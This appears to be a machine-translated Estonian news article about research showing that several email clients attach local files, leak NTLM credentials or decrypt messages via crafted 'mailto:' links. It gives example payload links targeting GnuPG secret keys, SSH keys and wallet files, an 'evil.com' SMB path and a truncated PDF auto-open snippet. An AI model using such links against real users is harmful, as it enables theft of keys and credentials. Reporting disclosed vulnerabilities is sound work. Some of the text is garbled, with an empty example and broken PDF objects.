Rünnak e-posti klientide kasutajate vastu, kasutades linke «mailto:»

Ruhr-University Bochumi teadlased (Saksamaa) analüüsisid (PDF) e-posti klientide käitumine linkide «mailto:» töötlemisel laienevate parameetritega. Viis kahekümnest vaadeldud e-posti kliendist olid haavatavad rünnaku suhtes, mis manipuleeris ressursside asendamisega parameetri «attach» kaudu. Veel kuus e-posti klienti olid haavatavad PGP ja S/MIME võtmete vahetamise rünnaku suhtes ning kolm klienti osutusid haavatavaks krüpteeritud sõnumite sisu väljavõtmise rünnaku suhtes.

Lingid «mailto:» kasutatakse e-posti kliendi automaatseks avamiseks, et kirjutada kirja antud lingis märgitud saajale. Lisaks e-posti aadressile saab lingi koostises määrata ka täiendavaid parameetreid, näiteks kirja teema ja tüüpilise sisu mall. Eeskujuks olev rünnak manipuleerib parameetriga «attach», mis võimaldab luua kirja ka manuse.

Post clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ja Pegasus Mail on haavatavad lihtsale rünnakule, mis võimaldab automaatselt kinnitada igasuguseid kohalikke faile, kasutades linki kujul «mailto:?attach=faili_teel». Fail kinnitatakse ilma hoiatuse kuvamiseta, mistõttu kasutaja võib, kui talle ei pöörata erilist tähelepanu, mitte märgata, et kiri saadetakse koos manusega.

Näiteks lingi kujul «mailto:?to=user@example.com&subject=Pealkiri&body=Tekst&attach=~/.gnupg/secring.gpg» abil on võimalik kinnitada GnuPG suletud võtmed kirja. Samuti on võimalik saata krüptorahakottide sisu (~/.bitcoin/wallet.dat), SSH-võtmed (~/.ssh/id_rsa) ja muid kasutajale ligipääsetavaid faile. Veelgi enam, Thunderbird võimaldab kinnitada faile rühmana mustri järgi, kasutades konstruktsioone, nagu «attach=/tmp/*.txt».

Lisaks kohalikele failidele suudavad mõned e-posti kliendid töödelda linke võrguhoidlatest ja teid IMAP-serveris. Eriti võimaldab IBM Notes edastada faili võrgu kataloogist, kui töödeldakse linke vormingus «attach=\\evil.com\dummyfile», samuti haarata NTLM autentimise parameetreid, saates lingi SMB-serverisse, mis on ründaja kontrolli all (päring saadetakse kasutaja praeguste autentimise parameetritega).

Thunderbird töötleb edukaid päringuid vormingus «attach=imap:///fetch>UID>/INBOX>1/», mis võimaldavad manustada sisu IMAP-serveri kaustadest. Sel juhul dekrüpteeritakse IMAP-ist saadud kirjad, mis on krüpteeritud OpenPGP ja S/MIME meetoditega, automaatselt e-posti kliendi poolt enne saatmist. Thunderbirdi arendajad olid teavitatud probleemist veebruaris, ja versioonis Thunderbird 78 on probleem juba lahendatud (Thunderbirdi versioonid 52, 60 ja 68 jäävad siiski haavatavaks).

Vanad Thunderbird'i versioonid on samuti haavatavad kahe PGP ja S/MIME rünnaku suhtes, mille on esitanud teadlased. Eelkõige on Thunderbird'i, samuti OutLooki, PostBoxi, eM Clienti, MailMate'i ja R2Mail2 suhtes kohaldatav võtme asendamise rünnak, mis tuleneb sellest, et meiliprogramm impordib ja paigaldab automaatselt uued sertifikaadid, mis edastatakse S/MIME sõnumites, võimaldades ründajal asendada juba salvestatud kasutaja avalikke võtmeid.

Teine rünnak, millele on haavatavad Thunderbird, PostBox ja MailMate, manipuleerib sõnumite mustandite automaatse salvestamise mehhanismi omadustega ja võimaldab mailto parameetrite abil alustada krüpteeritud sõnumite dekrüpteerimist või digitaalse allkirja lisamist suvalistele sõnumitele, edastades seejärel tulemuse ründaja IMAP-serverile. Krüpteeritud tekst edastatakse selle rünnaku käigus parameetri "body" kaudu ja ründaja IMAP-serveriga ühenduse loomise käivitamiseks kasutatakse "meta refresh" tähist. Näiteks: ''

Automaatseks «mailto:» linkide töötlemiseks ilma kasutaja sekkumiseta võivad olla kasutusel spetsiaalselt kujundatud PDF-dokumendid — OpenAction PDF-is võimaldab automaatselt avada mailto töötlejat dokumenti avades:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Rünnakud e-posti klientide vastu «mailto:» linkide kaudu

Allikas: opennet.ru

Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster